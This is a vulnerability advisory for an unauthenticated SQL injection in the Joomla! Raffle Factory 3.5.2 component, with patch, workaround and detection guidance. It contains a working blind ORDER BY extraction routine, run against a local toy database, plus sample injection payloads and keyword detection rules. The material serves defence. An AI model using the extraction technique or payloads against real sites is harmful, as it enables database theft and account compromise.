CVE-2018-17379

9.8 CRITICAL

📋 TL;DR

SQL injection in the Raffle Factory 3.5.2 component for Joomla! lets a remote, unauthenticated attacker execute arbitrary SQL via the filter_order or filter_order_Dir parameter. These are the standard Joomla! list-ordering inputs (sort column and sort direction), so the injected text lands in the query's ORDER BY clause, a position that cannot be protected with bind parameters and must instead be allowlisted. Any Joomla! site with the vulnerable component installed and enabled is affected; an attacker can read, modify or delete database content, including raffle and user data.

💻 Affected Systems

Products:
  • Joomla! Raffle Factory component
Versions: 3.5.2
Operating Systems: All platforms running Joomla!
Default Config Vulnerable: ⚠️ Yes
Notes: Affects Joomla! installations with Raffle Factory 3.5.2 component enabled.

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete compromise of everything the component's database user can reach: theft or destruction of all site data, and potential full site takeover by chaining the injection (for example, recovering administrator password hashes from the Joomla! users table, cracking or reusing them to log in to the backend, and installing an arbitrary extension from there).

🟠

Likely Case

Disclosure of database contents (raffle entries, participant records, Joomla! user accounts and password hashes) through blind, ordering-based extraction, or manipulation of that data; recovered credentials can then lead to privilege escalation.

🟢

If Mitigated

Low impact once the component restricts the sort column to an allowlist of known column names and the direction to ASC or DESC. Parameterized queries alone do not help here: ORDER BY column names and sort directions are identifiers, not values, and cannot be bound as parameters.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: CONFIRMED
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code available on Exploit-DB and Packet Storm Security.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.5.3 or later

Vendor Advisory: https://extensions.joomla.org/extension/raffle-factory/

Restart Required: No

Instructions:

1. Update the Raffle Factory component to version 3.5.3 or later via the Joomla! Extension Manager (Extensions → Manage).
2. Verify the update completed successfully: Extensions → Manage → Manage should list the new version.
3. Test the component's front-end and back-end functionality, including list views that use sorting.

🔧 Temporary Workarounds

Input Validation Filter (platform: all)

Restrict filter_order to an allowlist of the column names the list view actually sorts on, and filter_order_Dir to ASC or DESC, falling back to a safe default for anything else. This has to happen in the component code before the ORDER BY clause is assembled; escaping or quoting the value is not a substitute, because a sort column is an identifier, not a string literal. Edits to the component's PHP will be overwritten by the next extension update, so record them.

Web Application Firewall Rule (platform: all)

Add a WAF rule that inspects requests carrying filter_order or filter_order_Dir and rejects values outside the expected set (identifier-like names such as a.title; ASC or DESC). Apply the rule to the URL-decoded value and to POST bodies as well as query strings, since Joomla! list forms commonly submit these fields by POST. A keyword blocklist (UNION, SELECT, INSERT, DELETE) is weaker: it must match case-insensitively on the decoded value, and time-based payloads built on SLEEP() or BENCHMARK() contain none of those keywords.
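The following is an added example, not code from the Raffle Factory component or from Joomla!. It models the flaw class behind this CVE and the allowlist workaround above, and shows why the "Likely Case" above is data disclosure: an ORDER BY injection needs no error messages or UNION, because the sort order of the response itself is a one-bit oracle. The schema, table and column names and the sample rows are constructed stand-ins (the real schema is not on the page); the two parameter names are the ones from the advisory.

```python
import string
import sqlite3

# Constructed stand-in for the component's database. The real table and column
# names are not given on the page; these are illustrative only.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE raffles (id INTEGER PRIMARY KEY, title TEXT, tickets INTEGER);
        INSERT INTO raffles VALUES (1, 'Spring draw', 40), (2, 'Summer draw', 15),
                                   (3, 'Autumn draw', 27);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (42, 'admin', 'NotARealHash');
    """)
    return con


def list_raffles_vulnerable(con, filter_order: str, filter_order_dir: str) -> list:
    """Flaw class on the page: sort column and direction are spliced into the SQL
    text. ORDER BY cannot take bind parameters, so parameterizing cannot fix this."""
    sql = f"SELECT id FROM raffles ORDER BY {filter_order} {filter_order_dir}"
    return [row[0] for row in con.execute(sql)]


def order_oracle(con, condition: str) -> bool:
    """Boolean oracle: a CASE expression in ORDER BY sorts ascending when the
    attacker-chosen condition is true and descending when it is false."""
    payload = f"(CASE WHEN ({condition}) THEN id ELSE -id END)"
    return list_raffles_vulnerable(con, payload, "ASC") == [1, 2, 3]


def extract_admin_password_prefix(con, length: int) -> str:
    """Recover the first `length` characters of the admin password column one
    character at a time, using nothing but the order of the returned rows."""
    found = ""
    for pos in range(1, length + 1):
        for ch in string.ascii_letters + string.digits:
            cond = (f"(SELECT substr(password, {pos}, 1) FROM users "
                    f"WHERE username = 'admin') = '{ch}'")
            if order_oracle(con, cond):
                found += ch
                break
    return found


# Hardened form: allowlist the identifier and the direction, fall back to defaults.
ALLOWED_ORDER = {"id": "id", "title": "title", "tickets": "tickets"}
ALLOWED_DIR = {"ASC", "DESC"}


def list_raffles_hardened(con, filter_order, filter_order_dir) -> list:
    col = ALLOWED_ORDER.get(str(filter_order).lower(), "id")
    direction = str(filter_order_dir).upper()
    if direction not in ALLOWED_DIR:
        direction = "ASC"
    # Only values taken from the allowlist ever reach the query text.
    sql = f'SELECT id FROM raffles ORDER BY "{col}" {direction}'
    return [row[0] for row in con.execute(sql)]


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, blind extraction:", extract_admin_password_prefix(con, 4))
    print("hardened, same payload shape:",
          list_raffles_hardened(con, "(CASE WHEN 1 THEN id ELSE -id END)", "ASC"))
```

Against the vulnerable builder the oracle recovers "NotA" from the admin row without any output other than row order; against the hardened builder the same payload is silently replaced by the default sort. Joomla!'s own list-model base class applies the same idea by checking the requested ordering against a filter_fields allowlist, which is the pattern a component fix should follow.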

🧯 If You Can't Patch

  • Disable or uninstall the Raffle Factory component (Extensions → Manage → Manage) until a fixed version can be installed.
  • Restrict who can reach the site (IP allowlisting or web-server authentication in front of Joomla!) and keep the database server segmented from the web tier so that a compromise of the site's database user does not expose other systems.

🔍 How to Verify

Check if Vulnerable:

Check Joomla! Extension Manager for Raffle Factory version 3.5.2

Check Version:

Check via Joomla! admin panel: Extensions → Manage → Manage

Verify Fix Applied:

Confirm Raffle Factory version is 3.5.3 or later in Extension Manager

📡 Detection & Monitoring

Log Indicators:

  • SQL error messages in Joomla! logs or PHP error logs triggered by requests to the component's list views
  • Database query logs (MySQL general or slow query log) showing ORDER BY clauses that contain subqueries, CASE expressions, SLEEP() or BENCHMARK()
  • Bursts of requests from one client that vary only the filter_order or filter_order_Dir value, which is characteristic of automated blind injection

Network Indicators:

  • HTTP requests whose filter_order value is not a plain column identifier, or whose filter_order_Dir value is anything other than ASC or DESC (inspect the URL-decoded value; payloads usually arrive percent-encoded)
  • Long-running or unusually frequent database connections from the web server coinciding with such requests (time-based payloads show up as query latency)

SIEM Query:

web.url:*/raffle-factory* AND (web.param:*filter_order_Dir* OR web.param:*filter_order*) AND (web.param:*UNION* OR web.param:*SELECT* OR web.param:*INSERT* OR web.param:*DELETE* OR web.param:*CASE* OR web.param:*SLEEP* OR web.param:*BENCHMARK*)

Run this against URL-decoded, case-normalized request fields; raw access logs keep payloads percent-encoded (for example %20SELECT%20), which the patterns above will not match. The */raffle-factory* path fragment assumes SEF routing; on sites that also expose the non-SEF index.php?option=... form, match on the parameter names alone. A tighter alternative to keyword matching is to alert whenever filter_order is not a plain identifier or filter_order_Dir is anything other than ASC or DESC.
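As an added example (not tooling from the page or the vendor), the check below implements the allowlist-based detection described in this section over Apache combined-format access log lines. Unlike the keyword query above it works on the URL-decoded parameter value and flags anything that is not an identifier or ASC/DESC, so encoded and keyword-free payloads are caught. The log lines, client addresses, option=com_example URL scheme and the attack strings are constructed for the example; only the two parameter names come from the advisory.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Apache combined-log lines. The component's URL scheme (option=com_example)
# and the attacker traffic are assumptions made for this example.
SAMPLE_LOG = [
    '203.0.113.10 - - [25/Sep/2018:10:01:02 +0000] "GET /index.php?option=com_example&view=raffles&filter_order=a.title&filter_order_Dir=desc HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '203.0.113.10 - - [25/Sep/2018:10:01:05 +0000] "GET /index.php?option=com_example&view=raffles HTTP/1.1" 200 5101 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2018:10:02:11 +0000] "GET /index.php?option=com_example&view=raffles&filter_order=%28CASE%20WHEN%20%28SELECT%20substr%28password%2C1%2C1%29%20FROM%20users%29%3D%27N%27%20THEN%20id%20ELSE%20-id%20END%29&filter_order_Dir=ASC HTTP/1.1" 200 5123 "-" "sqlmap/1.2"',
    '198.51.100.7 - - [25/Sep/2018:10:02:12 +0000] "GET /index.php?option=com_example&view=raffles&filter_order=id&filter_order_Dir=ASC%2C%28SELECT%20SLEEP%285%29%29 HTTP/1.1" 200 5123 "-" "sqlmap/1.2"',
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
WATCHED = {"filter_order", "filter_order_Dir"}
# A legitimate sort column looks like an identifier, optionally table-aliased (a.title).
IDENT_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$")
ALLOWED_DIR = {"", "ASC", "DESC"}
# Tokens that never belong in a sort column or direction, matched on the decoded value.
SQL_TOKENS = re.compile(
    r"\b(select|union|case|when|sleep|benchmark)\b|[()'\";,=]|--|/\*", re.I
)


def suspicious_params(target: str) -> list:
    """Return (name, decoded value, reason) for each watched parameter whose value is
    not an identifier / ASC / DESC. parse_qsl undoes percent-encoding, so %28SELECT...
    is inspected as (SELECT..."""
    findings = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if name not in WATCHED:
            continue
        if name == "filter_order_Dir":
            allowed = value.upper() in ALLOWED_DIR
        else:
            allowed = bool(IDENT_RE.match(value))
        has_tokens = bool(SQL_TOKENS.search(value))
        if not allowed or has_tokens:
            findings.append((name, value, "sql-token" if has_tokens else "not-allowlisted"))
    return findings


def scan(lines) -> list:
    """Parse combined-format lines and return one hit per request with suspect params."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = suspicious_params(m.group("target"))
        if findings:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), "params": findings})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], hit["params"])
```

The first two sample lines (a normal aliased sort and a request with no sort parameters) produce no hits; the last two do. Access logs only carry the query string, so this check sees GET requests; Joomla! list forms often POST these fields, and for those you need WAF or application-level request logging that captures the body.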
